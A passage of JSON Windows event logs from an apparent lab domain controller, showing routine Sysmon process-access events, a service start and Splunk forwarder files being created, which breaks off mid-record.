{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2886,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.264\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.264","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2887,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.264\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.264","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2888,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.264\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.264","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2889,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.264\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.264","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2890,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.264\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.264","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76851,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The UALSVC service entered the running state.","param1":"UALSVC","param2":"running","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2891,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:55:27.702\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\Packet.dll\r\nCreationUtcTime: 2020-08-01 07:55:27.702","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:55:27.702","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\Packet.dll","CreationUtcTime":"2020-08-01 07:55:27.702","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2892,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:55:27.702\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\concrt140.dll\r\nCreationUtcTime: 2020-08-01 07:55:27.702","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:55:27.702","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\concrt140.dll","CreationUtcTime":"2020-08-01 07:55:27.702","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2893,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:55:27.702\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\msvcp140.dll\r\nCreationUtcTime: 2020-08-01 07:55:27.702","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:55:27.702","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\msvcp140.dll","CreationUtcTime":"2020-08-01 07:55:27.702","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2894,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.702\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys\r\nCreationUtcTime: 2020-08-01 07:55:27.702","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.702","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","CreationUtcTime":"2020-08-01 07:55:27.702","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2895,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:55:27.702\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmflow.dll\r\nCreationUtcTime: 2020-08-01 07:55:27.702","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:55:27.702","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmflow.dll","CreationUtcTime":"2020-08-01 07:55:27.702","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2896,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:55:27.702\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmframework.dll\r\nCreationUtcTime: 2020-08-01 07:55:27.702","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:55:27.702","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmframework.dll","CreationUtcTime":"2020-08-01 07:55:27.702","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2897,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:55:27.702\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nProcessId: 2488\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\qmprotocols.dll\r\nCreationUtcTime: 2020-08-01 07:55:27.702","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:55:27.702","ProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program 